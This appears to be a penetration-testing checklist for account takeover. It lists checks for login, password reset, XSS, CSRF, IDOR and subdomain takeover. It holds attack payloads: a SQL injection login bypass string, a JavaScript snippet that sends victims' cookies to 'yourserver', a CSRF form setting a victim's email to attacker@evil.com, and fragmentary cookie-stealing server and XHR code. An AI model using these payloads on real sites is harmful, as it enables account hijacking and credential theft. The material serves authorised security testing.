Account Takeover Checklist
- login:
- check if you are able to brute force the password
- Test for OAuth misconfigurations
- check if you are able to bruteforce the login OTP
- check for JWT mesconfigurations
- Test for SQL injection to bypass authentication
admin" or 1=1;--
- check if the application validates the OTP or Token
- password reset:
- check if you are able to brute force the password reset OTP
- test for token predectability
- test for JWT misconfigurations
- check if the password reset endpoint is vulnerable to IDOR
- check if the password reset endpoint is vulnerable to Host Header injection
- check if the password reset endpoint is leaking the token or OTP in the HTTP response
- check if the application validates the OTP or Token
- test for HTTP parameter Pollution (HPP)
- XSS to Account Takeover:
- if the application does not use auth token or you can’t access the cookies because the “HttpOnly” flag, you can obtain the CSRF token and craft a request to change the user’s email or password
- try to exfiltrate the cookies
- try to exfiltrate the Auth Token
- if the cookie’s “domain” attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies
PoC Example
this script will create a hidden <img> element
when the browser tries to load the image
the victim's cookies will be sent to your server
var new_img = document.createElement('img');
new_img.src = "http://yourserver/" + document.cookie;
new_img.style = 'display: none;'
- CSRF to Account Takeover:
- check if the email update endpoint is vulnerable to CSRF
- check if the password change endpoint is vulnerable to CSRF
PoC Example
<title>CSRF PoC</title>
<form name='attack' action='https://example.com/update-email' method='POST'>
<input type="hidden" name="new_email" value="attacker@evil.com">
<input type="submit" name="submit" value="submit" hidden>
- IDOR to Account Takerover:
- checck if the email update endpoint is vulnerable to IDOR
- check if the password change endpoint is vulnerable to IDOR
- check if the password reset endpoint vulnerable to IDOR
- subdomain takeover:
- first-order: check if you can takeover xyz.example.com, you can host any malicious code to steal users info or cookies
PoC Example
from flask import *
app = Flask(__name__)
def cookie_sniffer():
for c_name, c_value in request.cookies.items():
print(c_name + ': ' + c_value)
return 'Hello, world'
if __name__ == '__main__':
- second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can takeover this domain, you can host any malicious javascript file and use it to steal users info or cookies
PoC Example
user_cookies = {
"cookies": document.cookie
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "/store-cookies", true);
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